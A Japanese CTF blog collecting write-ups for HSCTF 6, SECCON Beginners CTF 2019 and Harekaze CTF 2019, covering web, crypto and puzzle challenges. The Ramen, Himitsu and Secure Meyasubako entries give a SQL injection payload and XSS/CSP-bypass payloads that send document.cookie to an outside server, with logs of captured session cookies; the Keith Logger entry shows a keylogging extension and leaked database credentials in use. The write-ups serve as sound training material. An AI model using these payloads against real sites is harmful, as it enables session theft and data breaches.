こんとろーるしーこんとろーるぶい

週末にカチャカチャッターン!したことを貼り付けていくブログ

HSCTF 6 Writeup - Keith Logger

Question

Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?

Solution

添付ファイルは拡張子crxのChrome Extension。
7zipで中身を覗くとcontent.jsがある。

var timeout_textarea;
var xhr_textarea;

$("textarea").on("keyup", function() {
  if (timeout_textarea) {
    clearTimeout(timeout_textarea);
  }

  if (xhr_textarea) {
    xhr_textarea.abort();
  }

  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
        encodeURIComponent($("textarea").val()) +
        "&url=" + encodeURIComponent(window.location.href),
      true
    );*/


    // send a request to admin whenever something is logged, not needed anymore after testing
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/admin",
      true
    );*/

    xhr.send();
  }, 2000);
});

URLが出てきたのでアクセスしてみる。

root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/record?text=aaa&url=bbb"
{'text': 'aaa', 'url': 'bbb', 'time': '13:47:05.441928'}


root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/admin"
didn't have time to implement this page yet. use admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now

更にURLが出てきた。

root@kali:~# curl "keith-logger-mongodb.web.chal.hsctf.com:27017"
It looks like you are trying to access MongoDB over HTTP on the native driver port.

mongoDBで接続してみるとよさそうだ。

mongoコマンドが必要。
Kali Linuxにインストールする場合、以下の手順でインストールできる。

docs.mongodb.com

接続して、データベース、コレクションを表示する。

root@kali:~# mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase admin
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ea9498a4-faa7-4a40-9613-9fc71f6c94f2") }
MongoDB server version: 4.0.10

> show dbs
database  0.000GB

> use database
switched to db database

> show collections
collection

databaseというデータベースに、collectionというコレクションがあるらしい。

> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }

フラグゲット
hsctf{watch_out_for_keyloggers}

SECCON Beginners CTF 2019 Writeup

noranecoは未参加だったので、いつもと違うチームで参加。
Webメイン、CryptとMisc少々解いた。昨年より難しかった印象。

おそらく色々な人がwriteupを書いてくれると思うので、いつもより簡易的な説明に留める。

[warmup] Ramen

Question

ラーメン https://ramen.quals.beginners.seccon.jp

Solution

SQL Injection自明。union句が使える。
information_schemaからテーブル名と列名を取得してflagテーブルからフラグゲット。

root@kali:~# curl https://ramen.quals.beginners.seccon.jp -G --data-urlencode "username=' union all select 1,flag from flag #"
(snip)
                                                    <tr>
                                <td>せくこん太郎</td>
                                <td>1970 年よりラーメン道一本。美味しいラメーンを作ることが生きがい。</td>
                            </tr>
                                                    <tr>
                                <td>せくこん次郎</td>
                                <td>せくこん太郎の弟。好きな食べものはコッペパン。</td>
                            </tr>
                                                    <tr>
                                <td>せくこん三郎</td>
                                <td>せくこん次郎の弟。食材本来の味を引き出すことに全力を注ぐ。</td>
                            </tr>
                                                    <tr>
                                <td>1</td>
                                <td>ctf4b{a_simple_sql_injection_with_union_select}</td>
                            </tr>
(snip)

katsudon

Question

Rails 5.2.1で作られたサイトです。

https://katsudon.quals.beginners.seccon.jp

クーポンコードを復号するコードは以下の通りですが、まだ実装されてないようです。

フラグは以下にあります。 https://katsudon.quals.beginners.seccon.jp/flag

# app/controllers/coupon_controller.rb
class CouponController < ApplicationController
def index
end

def show
  serial_code = params[:serial_code]
  @coupon_id = Rails.application.message_verifier(:coupon).verify(serial_code)
  end
end

Solution

https://katsudon.quals.beginners.seccon.jp/flagにアクセスすると、BAhJIiVjdGY0YntLMzNQX1kwVVJfNTNDUjM3X0szWV9CNDUzfQY6BkVU--0def7fcd357f759fe8da819edd081a3a73b6052aという文字列。

root@kali:~# echo -n BAhJIiVjdGY0YntLMzNQX1kwVVJfNTNDUjM3X0szWV9CNDUzfQY6BkVU | base64 -d
I"%ctf4b{K33P_Y0UR_53CR37_K3Y_B453}:ET

Himitsu

Question

抱え込まないでくださいね。 https://himitsu.quals.beginners.seccon.jp

ソースコード: https://score.beginners.seccon.jp/files/c8568442c06826ed8bba5695a0ca2ea3_himitsu.zip

Solution

タイトルに<img src=x onerror="location.href='http://myserver/?q=' + document.cookie">をセットして投稿する。 myserverは自分で立てたWebサーバ。

投稿して払い出された記事IDを使って、本文に[#[#記事ID#]#]をセットして再投稿する。

すると、記事のタイトルのバリデーションチェックをバイパスできる。
結果、最初に投稿したタイトルXSS攻撃コードを持つタイトルが文中に展開されてスクリプトが動作する。

管理者に秘密を共有すると自分のWebサーバにアクセスが来てセッションIDを窃取できる。 (通報時にスクリプトが動作してしまので工夫が必要)

153.120.82.72 - - [25/May/2019:23:56:31 +0900] "GET /?q=PHPSESSID=535251b86c56f77b804c4343f6a868e3 HTTP/1.1" 200 288 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/74.0.3729.157 Safari/537.36"

f:id:graneed:20190526150355p:plain

Secure Meyasubako

Question

みなさまからのご意見をお待ちしています。 https://meyasubako.quals.beginners.seccon.jp

参考: https://score.beginners.seccon.jp/files/f379baacbdd51cd8305869a633377aa4_crawl.js

Solution

CSPをバイパスする問題。

CSP Evaluatorで調べると、script-srcの設定にリスクがあることがわかる。

以下の記事を参考に、JSONPでイベント発火させ、Cookieを付与して自サーバに画面遷移させるスクリプトを組む。 github.com

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click=$event.view.location.replace("http://myserver?q="+$event.view.document.cookie)>
<script async src=https://www.google.com/complete/search?client=chrome&q=aaaa&callback=p.click></script>

管理者に届けるとアクセスが来た。

153.120.128.5 - - [26/May/2019:01:37:09 +0900] "GET /?q=flag=ctf4b{MEOW_MEOW_MEOW_NO_MORE_WHITELIST_MEOW} HTTP/1.1" 200 288 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/74.0.3729.157 Safari/537.36"

Party

Question

Let's 暗号パーティ

File: party.tar.gz

Solution

連立方程式にして、あとはsimpyを使うだけ。

from Crypto.Util.number import long_to_bytes
import sympy

x = sympy.Symbol('x')
y = sympy.Symbol('y')
z = sympy.Symbol('z')

party = [
    5100090496682565208825623434336918311864447624450952089752237720911276820495717484390023008022927770468262348522176083674815520433075299744011857887705787,
    3084167692493508694370768656017593556897608397019882419874114526720613431299295063010916541874875224502547262257703456540809557381959085686435851695644473,
    6308915880693983347537927034524726131444757600419531883747894372607630008404089949147423643207810234587371577335307857430456574490695233644960831655305379
]
val = [
    222638290427721156440609599834544835128160823091076225790070665084076715023297095195684276322931921148857141465170916344422315100980924624012693522150607074944043048564215929798729234427365374901697953272928546220688006218875942373216634654077464666167179276898397564097622636986101121187280281132230947805911792158826522348799847505076755936308255744454313483999276893076685632006604872057110505842966189961880510223366337320981324768295629831215770023881406933,
    81417930808196073362113286771400172654343924897160732604367319504584434535742174505598230276807701733034198071146409460616109362911964089058325415946974601249986915787912876210507003930105868259455525880086344632637548921395439909280293255987594999511137797363950241518786018566983048842381134109258365351677883243296407495683472736151029476826049882308535335861496696382332499282956993259186298172080816198388461095039401628146034873832017491510944472269823075,
    340685435384242111115333109687836854530859658515630412783515558593040637299676541210584027783029893125205091269452871160681117842281189602329407745329377925190556698633612278160369887385384944667644544397208574141409261779557109115742154052888418348808295172970976981851274238712282570481976858098814974211286989340942877781878912310809143844879640698027153722820609760752132963102408740130995110184113587954553302086618746425020532522148193032252721003579780125
]

expr1 = x + party[0] * y + party[0]**2 * z - val[0]
expr2 = x + party[1] * y + party[1]**2 * z - val[1]
expr3 = x + party[2] * y + party[2]**2 * z - val[2]

ans = sympy.solve([expr1, expr2, expr3])
print(long_to_bytes(ans[x]))

実行結果

ctf4b{just_d0ing_sh4mir}

Dump

Question

Analyze dump and extract the flag!!

https://score.beginners.seccon.jp/files/fc23f13bcf6562e540ed81d1f47710af_dump

Solution

添付のPCAPファイルからデータを抜き出して、cyberchefでFrom_Octalかけて作成したファイルにbinwalk -eM download.datするだけ。

f:id:graneed:20190526151250p:plain

Sliding puzzle

Question

nc 133.242.50.201 24912

スライドパズルを解いてください。すべてのパズルを解き終わったとき FLAG が表示されます。

スライドパズルは以下のように表示されます。

----------------
|  0 |  2 |  3 |
|  6 |  7 |  1 |
|  8 |  4 |  5 |
----------------
0 はブランクで動かすことが可能です。操作方法は以下のとおりです。

0 : 上
1 : 右
2 : 下
3 : 左
最終的に以下の形になるように操作してください。

----------------
|  0 |  1 |  2 |
|  3 |  4 |  5 |
|  6 |  7 |  8 |
----------------
操作手順は以下の形式で送信してください。

1,3,2,0, ... ,2

Solution

アルゴリズムを一から作るのは辛い。
と思ってググったら以下の記事を発見。

py3.hateblo.jp

微妙なデータフォーマットの差異を吸収して、サーバとやりとりするロジック書いて実行したら勝ち。

import socket
import re
import itertools

from collections import deque

MOVE = {'U': (0, -1), 'D': (0, 1), 'L': (-1, 0), 'R': (1, 0)}  # (x,y)

def get_next(numbers):
    for d in 'UDLR':
        zero_index = numbers.index(0)
        tx, ty = zero_index % 3 + MOVE[d][0], zero_index // 3 + MOVE[d][1]
        if 0 <= tx < 3 and 0 <= ty < 3:
            target_index = ty * 3 + tx
            result = list(numbers)
            result[zero_index], result[target_index] = numbers[target_index], 0
            yield d, tuple(result)

def checkio(puzzle):
    queue = deque([(tuple(n for line in puzzle for n in line), '')])
    seen = set()
    while queue:
        numbers, route = queue.popleft()
        seen.add(numbers)
        if numbers == (0, 1, 2, 3, 4, 5, 6, 7, 8):
            return route
        for direction, new_numbers in get_next(numbers):
            if new_numbers not in seen:
                queue.append((new_numbers, route + direction))


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('133.242.50.201', 24912))

data = s.recv(1024).decode("utf-8")

for i in range(100):
    pattern = r'ctf4b{.*}'
    m = re.search(pattern, data)
    if m:
        print(data)
        break

    pattern = r'----------------\n\| ([0-9]{2}) \| ([0-9]{2}) \| ([0-9]{2}) \|\n\| ([0-9]{2}) \| ([0-9]{2}) \| ([0-9]{2}) \|\n\| ([0-9]{2}) \| ([0-9]{2}) \| ([0-9]{2}) \|\n----------------'
    m = re.search(pattern, data)
    if m:
        puzzle = [
            [int(m.group(1)),int(m.group(2)),int(m.group(3))],
            [int(m.group(4)),int(m.group(5)),int(m.group(6))],
            [int(m.group(7)),int(m.group(8)),int(m.group(9))]
        ]
        answer = checkio(puzzle)
        answer = ','.join(list(answer.replace('U','0').replace('R','1').replace('D','2').replace('L','3')))
        print(answer)
        s.sendall(answer.encode("utf-8"))
        data = s.recv(1024).decode("utf-8")
        print(data)
    else:
        print("error")
        break

実行結果

[+] Congratulations! ctf4b{fe6f512c15daf77a2f93b6a5771af2f723422c72}

Harekaze CTF 2019 Writeup - [a-z().]

Question

if (eval(your_code) === 1337) console.log(flag);

http://problem.harekaze.com:40001

Solution

1337の値を返す、a-z().の文字種かつ200文字未満のJavaScriptコードを作成できたらフラグがゲットできる問題。
環境はNode.jsのvmモジュール。

  if (code && code.length < 200 && !/[^a-z().]/.test(code)) {
    try {
      const result = vm.runInNewContext(code, {}, { timeout: 500 });
      if (result === 1337) {
        output = process.env.FLAG;
      } else {
        output = 'nope';
      }
    } catch (e) {
      output = 'nope';
    }
  } else {
    output = 'nope';
  }

参照可能なオブジェクトのnameプロパティを起点に、Stringの各種メソッドを使用して文字数を増幅し、1337に到達させる作戦。

developer.mozilla.org

> vm.runInNewContext("escape().length", {}, { timeout: 500 });
9
> vm.runInNewContext("this.constructor.name.length", {}, { timeout: 500 });
6
> vm.runInNewContext("escape().big().length", {}, { timeout: 500 });
20
> vm.runInNewContext("escape().strike().length", {}, { timeout: 500 });
26
> vm.runInNewContext("escape().link().length", {}, { timeout: 500 });
33
> vm.runInNewContext("escape().repeat(escape().length).length", {}, { timeout: 500 });
81

以下のように組み合わせると1337になった。

> vm.runInNewContext("escape().big().repeat(this.constructor.name.length).repeat(escape().length).link().link().link().link().link().link().link().link().link().link().strike().length", {}, { timeout: 500 });
1337

フラグゲット
HarekazeCTF{sorry_about_last_year's_js_challenge...}